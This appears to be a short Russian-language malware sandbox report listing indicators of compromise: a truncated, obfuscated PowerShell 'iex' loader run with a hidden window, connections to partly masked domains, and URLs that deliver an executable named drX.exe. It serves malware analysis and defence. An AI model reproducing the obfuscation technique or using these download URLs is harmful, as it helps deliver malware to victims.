Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $Env:cOmSPec[4,15,25]-JoIn'')([StriNG]::JOIN( '',('107}35_36R53D22}13_8t111D114R111~33v42}56v98R32%45H37_42_44v59t111v61~46R33v43H32}34v116v107_21_36_3Y63v28H111_114Y111v33}42H56Y98D32t45}3...
- 'pe##igon.hu':80
- 'le###ervest.ru':80
- 'le###ervest.ru':443
- http://pe##igon.hu/drX.exe
- http://www.pe##igon.hu/drX.exe
- http://le###ervest.ru/catalog/view/theme/odio-pro/template/drX.exe
- DNS ASK pe##igon.hu
- DNS ASK le###ervest.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $Env:cOmSPec[4,15,25]-JoIn'')([StriNG]::JOIN( '',('107}35_36R53D22}13_8t111D114R111~33v42}56v98R32%45H37_42_44v59t111v61~46R33v43H32}34v116v107_21_36_3Y63v28H111_114Y111v33}42H56Y98D32t45}3...' (со скрытым окном)